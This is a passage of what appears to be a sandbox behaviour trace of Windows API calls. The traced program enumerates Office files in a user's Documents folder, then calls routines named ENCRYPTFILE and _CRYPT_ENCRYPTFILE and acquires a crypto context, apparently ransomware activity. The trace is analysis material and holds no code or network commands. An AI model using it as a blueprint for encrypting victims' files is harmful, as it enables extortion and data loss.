lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x5ee892ad, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x5ee892ad, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.832] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadbfd0d0, ftCreationTime.dwHighDateTime=0x1d5b0eb, ftLastAccessTime.dwLowDateTime=0xacc27920, ftLastAccessTime.dwHighDateTime=0x1d5bce0, ftLastWriteTime.dwLowDateTime=0xacc27920, ftLastWriteTime.dwHighDateTime=0x1d5bce0, nFileSizeHigh=0x0, nFileSizeLow=0x13e27, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="oZbDkszpyQazC9.docx", cAlternateFileName="OZBDKS~1.DOC")) returned 1 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92b82780, ftCreationTime.dwHighDateTime=0x1d5d777, ftLastAccessTime.dwLowDateTime=0x5e34c700, ftLastAccessTime.dwHighDateTime=0x1d59cd2, ftLastWriteTime.dwLowDateTime=0x5e34c700, ftLastWriteTime.dwHighDateTime=0x1d59cd2, nFileSizeHigh=0x0, nFileSizeLow=0x15a35, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="QjLwz6.pptx", cAlternateFileName="QJLWZ6~1.PPT")) returned 1 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x785f0860, ftCreationTime.dwHighDateTime=0x1d5d61c, ftLastAccessTime.dwLowDateTime=0x1fa74340, ftLastAccessTime.dwHighDateTime=0x1d5bf97, ftLastWriteTime.dwLowDateTime=0x1fa74340, ftLastWriteTime.dwHighDateTime=0x1d5bf97, nFileSizeHigh=0x0, nFileSizeLow=0xeafd, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="T- t3K 6dV0.docx", cAlternateFileName="T-T3K6~1.DOC")) returned 1 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd56d6b00, ftCreationTime.dwHighDateTime=0x1d5b5ba, ftLastAccessTime.dwLowDateTime=0x6627ef90, ftLastAccessTime.dwHighDateTime=0x1d57c0d, ftLastWriteTime.dwLowDateTime=0x6627ef90, ftLastWriteTime.dwHighDateTime=0x1d57c0d, nFileSizeHigh=0x0, nFileSizeLow=0x1a9b, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="WfOLKWjF.xlsx", cAlternateFileName="WFOLKW~1.XLS")) returned 1 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.833] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.839] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c157d0, ftCreationTime.dwHighDateTime=0x1d565c1, ftLastAccessTime.dwLowDateTime=0x1a915610, ftLastAccessTime.dwHighDateTime=0x1d5e185, ftLastWriteTime.dwLowDateTime=0x1a915610, ftLastWriteTime.dwHighDateTime=0x1d5e185, nFileSizeHigh=0x0, nFileSizeLow=0x12d19, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="z6U2MzO.xlsx", cAlternateFileName="Z6U2MZ~1.XLS")) returned 1 [0073.839] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.839] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.839] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.840] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.840] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.840] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa95ebd80, ftCreationTime.dwHighDateTime=0x1d59c9b, ftLastAccessTime.dwLowDateTime=0x5bc02500, ftLastAccessTime.dwHighDateTime=0x1d5bb04, ftLastWriteTime.dwLowDateTime=0x5bc02500, ftLastWriteTime.dwHighDateTime=0x1d5bb04, nFileSizeHigh=0x0, nFileSizeLow=0xf755, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="z_HKc3lg6.pptx", cAlternateFileName="Z_HKC3~1.PPT")) returned 1 [0073.840] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.840] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.840] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.840] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.840] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.840] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2170, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x1b, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3564, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="礼мńဓ+\x10")) returned 0 [0073.840] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.840] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.840] FindClose (in: hFindFile=0x41ac240 | out: hFindFile=0x41ac240) returned 1 [0073.840] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|16hIz1 tYfBoIcwVhJi.docx|59kI0eZovuo4vI8.docx|AGO5jVFwME.pptx|aOtbGAAYxtk159gxW.xlsx|CzDg7AgA6_wtvH.ods|Database1.accdb|desktop.ini|eJ Z0ZcCpMN.doc|HD2UssJoRg1BYp.csv|Lh2OVLi_4PS_2RxxQd.odp|LI-IwwMLWnmp-I.pptx|mnsjU.xlsx|nDdxnatd.pptx|NHgtkAPLnX.docx|NwJd3dflnaF4DbF3Yn.xlsx|O8- 8r.odt|ooKroY8WpRTqCJ.xlsx|oZbDkszpyQazC9.docx|QjLwz6.pptx|T- t3K 6dV0.docx|WfOLKWjF.xlsx|z6U2MzO.xlsx|z_HKc3lg6.pptx", cchCount1=397, lpString2="", cchCount2=0) returned 3 [0073.840] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.840] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0073.840] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0073.840] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0073.840] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0073.840] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0073.841] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0073.841] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\16hIz1 tYfBoIcwVhJi.docx", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb1e850, ftCreationTime.dwHighDateTime=0x1d58c67, ftLastAccessTime.dwLowDateTime=0x8f874ac0, ftLastAccessTime.dwHighDateTime=0x1d5bf8d, ftLastWriteTime.dwLowDateTime=0x8f874ac0, ftLastWriteTime.dwHighDateTime=0x1d5bf8d, nFileSizeHigh=0x0, nFileSizeLow=0x5a50, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="16hIz1 tYfBoIcwVhJi.docx", cAlternateFileName="16HIZ1~1.DOC")) returned 0x41ac000 [0073.841] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0073.841] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0073.841] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0073.841] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0073.841] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0073.841] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0073.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca748, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0073.843] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\16hIz1 tYfBoIcwVhJi.docx" (normalized: "c:\\users\\fd1hvy\\documents\\16hiz1 tyfboicwvhji.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0073.843] FreeLibrary (hLibModule=0x772d0000) returned 1 [0073.843] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0073.843] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0073.843] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0073.843] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0073.843] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0073.843] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0073.843] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0073.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0073.843] CloseHandle (hObject=0x274) returned 1 [0073.843] FreeLibrary (hLibModule=0x772d0000) returned 1 [0073.843] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0073.843] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0073.843] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0073.844] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0073.844] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\16hIz1 tYfBoIcwVhJi.docx", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb1e850, ftCreationTime.dwHighDateTime=0x1d58c67, ftLastAccessTime.dwLowDateTime=0x8f874ac0, ftLastAccessTime.dwHighDateTime=0x1d5bf8d, ftLastWriteTime.dwLowDateTime=0x8f874ac0, ftLastWriteTime.dwHighDateTime=0x1d5bf8d, nFileSizeHigh=0x0, nFileSizeLow=0x5a50, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="16hIz1 tYfBoIcwVhJi.docx", cAlternateFileName="16HIZ1~1.DOC")) returned 0x41ac2c0 [0073.844] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0073.844] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0073.844] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0073.844] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0073.844] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0073.844] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0073.844] SetLastError (dwErrCode=0x0) [0073.844] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0073.844] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0073.844] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0073.844] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0073.844] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0073.844] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0073.844] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0073.844] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0073.844] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0073.844] PeekMessageW (in: lpMsg=0x144ea34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea34) returned 0 [0073.844] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0073.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0073.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0073.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0073.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796f88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0073.845] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5360) returned 1 [0074.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0074.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0074.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0074.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0074.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0074.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0074.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0074.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0074.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0074.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0074.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0074.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0074.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0074.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0074.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0074.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0074.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0074.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0074.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0074.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0074.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0074.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0074.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0074.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0074.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0074.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0074.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 